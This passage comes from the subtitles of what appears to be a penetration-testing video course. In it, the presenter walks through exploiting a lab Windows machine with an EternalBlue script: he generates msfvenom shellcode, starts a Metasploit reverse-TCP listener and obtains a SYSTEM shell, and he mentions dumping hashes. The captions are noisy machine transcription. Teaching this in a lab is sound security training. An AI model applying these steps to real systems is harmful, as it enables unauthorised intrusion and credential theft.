00:25:25,210 Same kind of idea. 387 00:25:25,390 --> 00:25:26,770 It's just doing everything for us. 388 00:25:26,780 --> 00:25:30,240 We could do this ourselves if we wanted to. 389 00:25:30,240 --> 00:25:30,510 All right. 390 00:25:30,810 --> 00:25:39,130 So coming through here now it says we need to do a run listener or the run listener prep so we go back 391 00:25:39,130 --> 00:25:44,250 a directory say let's make sure we're in the right directory OK. 392 00:25:44,270 --> 00:25:47,330 We're going to do listener prep the S H. 393 00:25:47,330 --> 00:25:49,520 Now we've got to generate a listener. 394 00:25:49,520 --> 00:25:51,840 So again we need our ELL host. 395 00:25:52,310 --> 00:25:55,380 I believe him at twenty six or twenty four twenty four. 396 00:25:55,430 --> 00:25:58,560 I used to be twenty six OK. 397 00:25:58,580 --> 00:26:04,950 And we said 4 4 4 5 4 4 4 6 0 and 0. 398 00:26:05,210 --> 00:26:09,670 So what this is doing is this is going to start Meadows Boy Meets Boy has something called an exploit 399 00:26:09,680 --> 00:26:19,130 handler and I will be showing you guys that as well so we can use exploit handler to to set up a listener. 400 00:26:19,130 --> 00:26:25,730 So we're listening here in the background for any connections that come through in our IP address at 401 00:26:25,730 --> 00:26:29,960 4 4 4 5 or 4 4 4 6. 402 00:26:29,960 --> 00:26:31,330 And that's all. 403 00:26:31,580 --> 00:26:33,860 So it has to know the payload that you use. 404 00:26:33,860 --> 00:26:39,850 So we're actually using a Windows X 64 interpreter reverse underscore TCT payload. 405 00:26:40,010 --> 00:26:46,510 So the payload that we generate which you saw we generated earlier MSF venom payload. 406 00:26:46,580 --> 00:26:49,970 This payload here has got to match the listener. 407 00:26:50,180 --> 00:26:52,010 So listeners defining the payload. 408 00:26:52,040 --> 00:26:55,770 And that's why it's asking these questions hey do you want to set up an interpreter listener. 409 00:26:55,790 --> 00:26:58,700 Do you want it to be staged like this or onstage. 410 00:26:58,700 --> 00:27:00,980 Do you want to be 64 bit blah blah blah. 411 00:27:01,010 --> 00:27:02,260 So it's doing that. 412 00:27:02,450 --> 00:27:08,030 And it set us up and then you see it set us up here with out a 64 bit payload and it's just handling 413 00:27:08,030 --> 00:27:09,760 this for us. 414 00:27:09,770 --> 00:27:12,860 So now you've got the multi handler running. 415 00:27:12,860 --> 00:27:16,430 I've got a new tag already opened up so you guys can open up manage tab as well. 416 00:27:16,850 --> 00:27:19,550 Let's scroll down to the pone down here. 417 00:27:19,550 --> 00:27:24,590 So this has been tested on Windows 7 server 2008 and Windows 10. 418 00:27:24,620 --> 00:27:28,380 It should work on Windows 8 and Server 2012 as well. 419 00:27:29,030 --> 00:27:32,950 So we say see these dot dot. 420 00:27:33,060 --> 00:27:35,220 Back to our main folder. 421 00:27:35,280 --> 00:27:41,250 Now we need to do is we need to say Eternal Blue exploits 7 not pi is what it looks like. 422 00:27:41,250 --> 00:27:46,860 So we'll say Python Eternal Blue exploit seven dot Pi. 423 00:27:46,860 --> 00:27:48,020 All right. 424 00:27:48,270 --> 00:27:52,990 We need the target IP which we know is 10 not 10 that 10 dot 40. 425 00:27:53,280 --> 00:27:55,530 We need the path to the shell code. 426 00:27:55,540 --> 00:27:59,480 SC All been which is just going to be shall code here. 427 00:27:59,570 --> 00:28:00,880 C all been. 428 00:28:00,900 --> 00:28:05,210 That's what it generated for us and then the number of Groom connections. 429 00:28:05,210 --> 00:28:07,580 Now I don't know exactly what the groom connections are. 430 00:28:07,580 --> 00:28:09,740 I know that it's super important. 431 00:28:09,740 --> 00:28:14,300 I think it starts with 12 or 13 and then we can set it manually if we're having issues but let's go 432 00:28:14,300 --> 00:28:19,030 ahead just leave that blank. 433 00:28:19,160 --> 00:28:19,470 OK. 434 00:28:19,470 --> 00:28:27,330 So I fired off and it looks like we got a session so we could type in sessions now and you could see 435 00:28:27,330 --> 00:28:32,880 that we've got authority system on session ones we just type in sessions one we've interacted. 436 00:28:32,880 --> 00:28:33,900 Same thing. 437 00:28:33,900 --> 00:28:35,140 Get you. 438 00:28:35,820 --> 00:28:37,800 Who am I or hostname. 439 00:28:37,830 --> 00:28:39,980 We can doesn't know hostname. 440 00:28:39,990 --> 00:28:40,830 That's OK. 441 00:28:40,900 --> 00:28:42,110 Use this info. 442 00:28:42,450 --> 00:28:45,920 And that's where you get your hostname so that's it. 443 00:28:45,990 --> 00:28:48,380 That's really it like from here. 444 00:28:48,390 --> 00:28:51,770 We took an easy exploit but we learned several things today right. 445 00:28:51,930 --> 00:28:54,720 We learned that we can do the exploit manually. 446 00:28:54,720 --> 00:28:57,360 We can also use medicinally to do it. 447 00:28:57,360 --> 00:28:59,660 We learned about different types of payloads. 448 00:28:59,670 --> 00:29:01,610 There are stage versus unsafe. 449 00:29:01,620 --> 00:29:07,500 Now I encourage you to go read up on what the benefits are both and what the differences are but you 450 00:29:07,500 --> 00:29:15,390 should know that they exist and you should know that you know the alternative might be an option or 451 00:29:15,390 --> 00:29:21,570 even a generic payload might be an option that if you're sure or unsure maybe try changing your payload 452 00:29:21,600 --> 00:29:27,720 before giving up completely on an exploit and we learned a little bit about MSF venom we're going to 453 00:29:27,720 --> 00:29:30,060 learn more about that in the next video. 454 00:29:30,200 --> 00:29:33,200 We learned about some load commands from interpreter. 455 00:29:33,260 --> 00:29:37,010 You know again how to dump hashes some important network commands. 456 00:29:37,070 --> 00:29:41,390 So really another SMB exploit that we can just take and build upon. 457 00:29:41,480 --> 00:29:47,570 And that's all we're after we're just going to continue building on these exploits and get better hopefully. 458 00:29:47,600 --> 00:29:52,160 So this is the end of episode three and that's that's all I got for you. 459 00:29:52,190 --> 00:29:56,360 So until the next episode I am TCM and I thank you for joining me.